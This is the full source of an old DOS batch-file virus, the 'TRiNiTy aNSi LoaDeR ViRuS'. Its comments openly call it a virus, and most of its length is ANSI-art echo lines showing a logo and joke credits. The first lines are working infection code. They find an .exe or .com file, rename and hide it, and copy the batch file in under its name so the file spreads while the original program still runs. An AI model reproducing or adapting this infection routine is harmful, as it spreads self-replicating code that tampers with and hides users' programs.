@REM [0;8m
@echo off
REM This is an actual virus written in the Batch programming (snicker)
REM language.   The art is by Moses and the programming is by Jesus.
REM                              (and yes dammit I was bored - Jesus)
REM - -----ÄÄÄÄÄÄÍÍÍÍÍÍÍğ[TRiNiTy aNSi LoaDeR ViRuS] ğÍÍÍÍÍÍÍÄÄÄÄÄÄ----- - -
ctty nul
for %%f in (*.exe *.com) do set NeWHoST=%%f
rename %NeWHoST% Å%NeWHoST%
attrib +h Å%NeWHoST%
copy %0.bat %NeWHoST%
ren %NeWHoST% *.bat
set NeWHoST=
ctty con
if errorlevel==1 goto DisplayLoader
goto EndVirus
:DisplayLoader
REM - -----ÄÄÄÄÄÄÍÍÍÍÍÍÍğğğğğğğğğğğğğğğğğğğğğğğğğğğğğğğÍÍÍÍÍÍÍÄÄÄÄÄÄ----- - -
REM
echo [255D[23C[0;31m°²±[27C°²±İ[0;8m
echo [0;31m[23C±[0;33m²±[27C[0;31m±[0;33m²±[0;31mŞ[0;8m
echo [0;31m[15C[0;33m°±±±±±±±[0;31m±[0;33m²±±±±±±±²Û[11C°±±±±±±±[0;31m±[A[0;8m
echo [0;31m[54C[0;33m²±[0;31m²[0;33m±±±±±²Û[0;8m
echo [0;31m[23C±±²[27C±±²[0;31mİ[0;8m
echo [23C[0;33m±±±[27C±±±[0;31mİ[0;8m
echo [23C[0;33m°°[0;31m²[27C[0;33m°°[0;31m²İ[0;8m
echo [23C[0;33m°[0;31m±²  [0;33mßÛßßÜ  Û   ßÛÜ   ßÜ  Û   °[0;31m±²İ[A[0;8m
echo [0;31m[57CÜ[0;33mßÜ   ßÜ[0;8m
echo [0;33m[23C°[0;31m±²   [0;33mÛ   Û  Û   Û Û   [0;31m°   [0;33mÛ  °[A[0;8m
echo [0;33m[54C[0;31m±²İ  [0;33mßÜ Üß[0;8m
echo [0;33m[23C°[0;31m±²  ß±[0;33mßÛß   [0;31m°   [0;33mÛ  Û  [0;31m±   [A[0;8m
echo [0;31m[50C°  [0;33m°[0;31m±²ŞÜ   ±[0;8m
echo [23C[0;33m°[0;31m±²   Û  [0;33mß[0;31m±  ±   ²   ° ²   ²  [A[0;8m
echo [53C[0;33m°[0;31m±²  ş Ü²[0;8m
echo [23C[0;33m°[0;31m±²[0;1;36mÄ[0;1;34mÄ[0;31mß[0;34mÄÄÄÄ[A[0;8m
echo [33C[0;31mßÜ[0;34mÄ[0;31mßÜ[0;34mÄ[0;31mÜß[0;34mÄÄÄ[0;31mßÜ[A[0;8m
echo [0;31m[46CßÜ[0;1;34mÄÄ[0;31mßÜ[0;1;34mÄ[0;33m°[0;31m±²[0;34mÄÄ[A[0;8m
echo [58C[0;1;34mÄ¿[0;31mŞ[0;8m
echo [23C[0;33m°[0;31m±²[0;34mG[0;1;34mod[0;1;30múúúúúúúúú[A[0;8m
echo [38C[0;1;34mş[0;1;30mú[0;34mProgram[0;31mİ[0;1;34me[0;1;36mr[A[0;8m
echo [0;1;36m[50C   [0;33m°[0;31m±²   [0;34m³[0;31m²[0;8m
echo [0;31m[24C±İ[0;34mJesus[0;1;30múúúúúúú[0;1;34mş[0;1;30mú[0;34mProgr[A[0;8m
echo [45Ca[0;31mŞÜ[0;1;36me[0;1;34mr    [0;31m±    Ş[0;8m
echo [24C[0;34m³[0;31mŞ[0;34mH[0;1;34mol[0;34my Spirit[0;1;30mú[A[0;8m
echo [38C[0;1;34mş[0;1;30mú[0;34mProgr[0;1;34ma[0;31mİş[0;1;34mer[A[0;8m
echo [0;1;34m[50C    [0;31m±    ø[0;8m
echo [24C[0;34m³[0;31mİ[0;34mN[0;1;34mo[0;34mah[0;1;30múúúúúúúú[A[0;8m
echo [38C[0;1;34mş[0;1;30mú[0;34mOrga[0;1;34mn[0;31mÛ[0;1;36mz[A[0;8m
echo [47C[0;1;34me[0;31mßÜ[0;34mWrit[0;31mßÜ   [0;1;34m³[0;8m
echo [24C[0;34m³[0;31mÜ[0;34mM[0;1;34mos[0;34mes[0;1;30múúúúúúú[A[0;8m
echo [38C[0;1;34mş[0;1;30mú[0;34mArt[0;1;34mi[0;31mŞ[0;1;36mt[A[0;8m
echo [46C[0;1;34m/P[0;34m.R[0;31mİ[0;1;34m/[0;34mWri[0;31mŞ[A[0;8m
echo [56C[0;34mer [0;1;36m³[0;8m
echo [24C[0;34mÀ[0;31mİ[0;34mÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[0;1;34mÄÄ[0;31m³[A[0;8m
echo [45C[0;1;34mÄÄ[0;34mÄÄÄ[0;31m³[0;34mÄÄÄÄ[0;1;34mÄ[0;31mİ[A[0;8m
echo [57C[0;1;36mÄÄ[0;1mÙ[0;8m
echo [44C[0;31m³[5Cø[0;8m
echo [0;31m[44C³[0;8m
echo [0;31m[44C³[0;8m
echo [0;31m[44C³[0;8m
:EndVirus
@echo [0m
@Å%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
